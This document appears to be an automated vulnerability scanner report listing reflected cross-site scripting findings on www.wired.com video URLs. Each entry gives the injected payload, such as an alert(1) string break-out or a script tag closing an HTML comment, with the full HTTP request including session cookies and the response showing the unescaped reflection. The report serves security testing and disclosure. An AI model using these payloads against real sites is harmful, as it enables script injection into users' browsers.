The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6894c"-alert(1)-"5f54f5d90f1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future6894c"-alert(1)-"5f54f5d90f1/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:48:42 GMT Date: Mon, 22 Nov 2010 00:43:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26bcb"-alert(1)-"61dcfa8e6d4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/66068399900126bcb"-alert(1)-"61dcfa8e6d4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:55 GMT Date: Mon, 22 Nov 2010 00:43:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ype="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 65aa7--><script>alert(1)</script>2113ffec678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video65aa7--><script>alert(1)</script>2113ffec678/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29457 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:39 GMT Date: Mon, 22 Nov 2010 00:36:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video65aa7--><script>alert(1)</script>2113ffec678/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4794"><a>46311d803b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoe4794"><a>46311d803b9/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29418 Vary: Accept-Encoding Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 00:40:26 GMT Date: Mon, 22 Nov 2010 00:35:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoe4794"><a>46311d803b9 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c5d5"-alert(1)-"d2f4632c524 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos6c5d5"-alert(1)-"d2f4632c524/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:42:35 GMT Date: Mon, 22 Nov 2010 00:38:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7dd7"><a>efaa178a617 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosf7dd7"><a>efaa178a617/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosf7dd7"><a>efaa178a617 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46eac"><a>eda7bcc3b14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest46eac"><a>eda7bcc3b14/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:43:02 GMT Date: Mon, 22 Nov 2010 00:38:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest46eac"><a>eda7bcc3b14"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e28"-alert(1)-"7a8fe52dfa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest86e28"-alert(1)-"7a8fe52dfa6/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:01 GMT Date: Mon, 22 Nov 2010 00:39:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c21e"-alert(1)-"2f370036848 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166337c21e"-alert(1)-"2f370036848/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:44:05 GMT Date: Mon, 22 Nov 2010 00:39:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46df5"-alert(1)-"ca26f7c7b3f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy--the-payoff46df5"-alert(1)-"ca26f7c7b3f/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:19 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665df"-alert(1)-"860e0e85e38 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001665df"-alert(1)-"860e0e85e38 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:44:27 GMT Date: Mon, 22 Nov 2010 00:39:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 38a2c--><script>alert(1)</script>0befce43f0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video38a2c--><script>alert(1)</script>0befce43f0d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29460 Vary: Accept-Encoding Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video38a2c--><script>alert(1)</script>0befce43f0d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33dc"><a>ed7e9567c2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoa33dc"><a>ed7e9567c2d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:07 GMT Date: Mon, 22 Nov 2010 00:36:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoa33dc"><a>ed7e9567c2d ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22ce8"-alert(1)-"d4bd5acd3f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos22ce8"-alert(1)-"d4bd5acd3f7/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:07 GMT Date: Mon, 22 Nov 2010 00:38:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bdde"><a>8d08fc4d8e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos6bdde"><a>8d08fc4d8e6/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos6bdde"><a>8d08fc4d8e6 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8465"-alert(1)-"19aa27f8e45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestf8465"-alert(1)-"19aa27f8e45/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:19 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209d5"><a>004865321b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest209d5"><a>004865321b8/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:42:48 GMT Date: Mon, 22 Nov 2010 00:38:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest209d5"><a>004865321b8"> ...[SNIP]...
